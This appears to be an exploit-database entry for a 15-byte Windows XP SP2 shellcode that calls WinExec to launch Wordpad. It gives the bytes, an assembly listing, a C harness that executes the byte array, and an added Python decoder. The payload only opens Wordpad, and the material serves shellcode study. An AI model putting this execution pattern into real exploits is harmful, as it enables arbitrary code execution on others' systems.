Windows/x86 (XP Professional SP2) (English) - Wordpad.exe Shellcode (15 bytes)

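Vulnerability ID 1057072 Vulnerability type
Published 2009-01-01 Updated 2009-01-01
CVE ID N/A CNNVD-ID N/A
Platform Windows_x86 CVSS score N/A
|Vulnerability source
https://www.exploit-db.com/exploits/43763
|Vulnerability details
Vulnerability details have not been disclosed
|Exploit (EXP)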
+-------------------------------------------------+

| Windows XP Pro Sp2 English "Wordpad" Shellcode. |

+-------------------------------------------------+


Size  : 15 Bytes.
Author: Aodrulez. 
Email : f3arm3d3ar@gmail.com


Shellcode = "\x6A\x05\x68\x97\x4C\x80\x7C\xB8"
            "\x4D\x11\x86\x7C\xFF\xD0\xCC";


+-----------+

| Asm Code: |

+-----------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

start:
	push 5
	push 7c804c97h    ;addr of "write" string in mem
	mov eax,7c86114dh ;addr of "WinExec" Function.
	call eax
	int 3h
end start

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
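
Added example (not part of the original post): a small Python decoder that maps the 15 bytes back to the assembly listing above and extracts the absolute address loaded into EAX before `call eax`. Both 32-bit immediates are hard-coded for the Windows build named in the title; the function names `decode` and `absolute_call_targets` are assumptions of this example.

```python
import struct

# The 15 shellcode bytes exactly as listed on the page.
SHELLCODE = bytes.fromhex("6A05 68974C807C B84D11867C FFD0 CC")

# First byte -> (instruction length, mnemonic). Covers only the encodings
# this shellcode uses; it is not a general x86 disassembler.
FORMS = {0x6A: (2, "push"), 0x68: (5, "push"),
         0xB8: (5, "mov eax,"), 0xCC: (1, "int3")}


def decode(buf):
    """Return a list of (offset, text, imm32 or None) for each instruction."""
    out, i = [], 0
    while i < len(buf):
        if buf[i:i + 2] == b"\xff\xd0":          # FF D0 = call eax
            out.append((i, "call eax", None))
            i += 2
            continue
        if buf[i] not in FORMS:
            raise ValueError(f"unhandled opcode {buf[i]:#04x} at offset {i}")
        size, mnem = FORMS[buf[i]]
        if i + size > len(buf):
            raise ValueError(f"truncated instruction at offset {i}")
        if size == 5:                            # 32-bit little-endian immediate
            (imm,) = struct.unpack_from("<I", buf, i + 1)
            out.append((i, f"{mnem} {imm:#010x}", imm))
        elif size == 2:                          # 8-bit immediate
            out.append((i, f"{mnem} {buf[i + 1]:#x}", None))
        else:
            out.append((i, mnem, None))
        i += size
    return out


def absolute_call_targets(buf):
    """Addresses loaded by `mov eax, imm32` immediately before `call eax`."""
    ins = decode(buf)
    return [a[2] for a, b in zip(ins, ins[1:])
            if a[1].startswith("mov eax,") and b[1] == "call eax"]


if __name__ == "__main__":
    for off, text, _ in decode(SHELLCODE):
        print(f"{off:02d}: {text}")
    print([hex(t) for t in absolute_call_targets(SHELLCODE)])
```
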


+-----------------+

| Shellcodetest.c |

+-----------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

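/* The 15 shellcode bytes from the listing above. */
char code[] = "\x6A\x05\x68\x97\x4C"
              "\x80\x7C\xB8\x4D\x11"
              "\x86\x7C\xFF\xD0\xCC";


int main(int argc, char **argv)
{
  /* Treat the byte array as a function and call it. */
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}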

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+-------------------+

| Greetz Fly Out To |

+-------------------+

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1] Amforked()	 : My Mentor.
2] The Blue Genius : My Boss.
3] www.orchidseven.com
4] www.isacm.org.in

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~